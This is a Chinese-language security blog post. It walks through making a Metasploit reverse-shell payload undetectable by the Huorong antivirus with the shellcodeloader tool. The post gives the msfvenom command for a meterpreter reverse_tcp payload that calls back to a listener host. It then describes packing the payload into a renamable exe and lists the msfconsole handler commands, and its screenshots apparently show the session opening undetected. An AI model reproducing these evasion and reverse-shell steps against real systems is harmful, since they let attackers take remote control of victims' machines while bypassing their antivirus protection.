Shellcodeloader免杀过火绒

访客 2022年03月29日 11:05 392 0

本文来源:

题记

今天脑子里面蹦出来个想法，免杀木马然后cs上线，本来想让cs与msf联动的，但是出了点小问题，还是先研究免杀火绒吧。

环境

Kali：192.168.0.119 win10:192.168.0.200

工具地址：https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

Shellcodeloader免杀过火绒-第1张图片-网盾网络安全培训

Shellcodeloader免杀过火绒-第2张图片-网盾网络安全培训

2、把木马移到工具上做免杀。

Shellcodeloader免杀过火绒-第3张图片-网盾网络安全培训

Shellcodeloader免杀过火绒-第4张图片-网盾网络安全培训

Shellcodeloader免杀过火绒-第5张图片-网盾网络安全培训

生成loder.exe软件，可随意改名，运行就能上线。

Shellcodeloader免杀过火绒-第6张图片-网盾网络安全培训

3、kali开启监听。

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.119

exploit

然后运行exe

上线

Shellcodeloader免杀过火绒-第7张图片-网盾网络安全培训

4、火绒检测

Shellcodeloader免杀过火绒-第8张图片-网盾网络安全培训

软件运行后检测。

Shellcodeloader免杀过火绒-第9张图片-网盾网络安全培训

标签：免杀火绒软件

本文地址： https://www.konghaidashi.com/post/6264.html

版权声明：除非特别标注，否则均为本站原创文章，转载时请以链接形式注明文章出处。

上一篇蓝队应急响应姿势之Linux

下一篇安全专家担忧欧盟DMA会破坏WhatsApp等应用的端到端加密

发表评论（已有0条评论）

还木有评论哦，快来抢沙发吧~